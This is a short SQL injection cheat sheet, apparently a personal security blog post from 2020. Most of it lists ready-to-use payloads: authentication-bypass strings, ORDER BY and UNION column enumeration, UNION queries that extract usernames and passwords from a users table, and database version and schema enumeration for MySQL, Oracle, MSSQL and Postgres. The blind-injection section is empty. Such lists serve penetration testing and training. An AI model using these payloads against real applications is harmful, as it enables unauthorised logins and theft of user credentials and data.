SQL Injection cheatsheet
SQLi reference

SQL Injection

SQL injection is a vulnerability within a web application that allows an attacker to interfere with normal queries that a web app makes to its database. Generally speaking this will allow unauthorised attackers to view data such as usernames, user account details, credit card details, password hashes and so on. SQL injection can also lead to Remote Code Exection (RCE) and an attacker gaining a shell on the vulnerable server.

PortSwigger - SQL Injection cheatsheet

Authentication bypass

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Column enumeration

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL FROM DUAL--     # Use DUAL for Oracle Queries

Finding columns that can hold string values

' UNION SELECT 'p',NULL,NULL,NULL--
' UNION SELECT NULL,'p',NULL,NULL--
' UNION SELECT NULL,NULL,'p',NULL--
' UNION SELECT NULL,NULL,NULL,'p'--

Retrieving data with UNION

' UNION SELECT username,password FROM users WHERE username='administrator'--
' UNION SELECT username || '~' || password FROM users--     # Oracle concat to one string
' UNION SELECT NULL,concat(username, ' : ', password) FROM users--    # Mysql concat to one string

Examining the database

' SELECT @@version#  # Mysql
' SELECT NULL,@@version# # Mysql
' SELECT * FROM v$version--   # Oracle
' UNION SELECT NULL,BANNER FROM v$version-- # Oracle
' SELECT version() # Postgres
' SELECT * FROM information_schema.tables # Mysql tables
' SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' # Mysql
' UNION SELECT NULL,table_name FROM information_schema.tables-- # non Oracle
' SELECT * FROM all_tables  # Oracle
' UNION SELECT NULL,table_name FROM all_tables-- # Oracle 
' SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'    # Oracle
' UNION SELECT NULL,column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'-- # Oracle
' SELECT * FROM information_schema.tables # MSSQL
' SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' # MSSQL
' SELECT * FROM information_schema.tables # Postgres
' SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' # Postgres

Blind SQL Injection

******
Written by Shain Lakin on 09 July 2020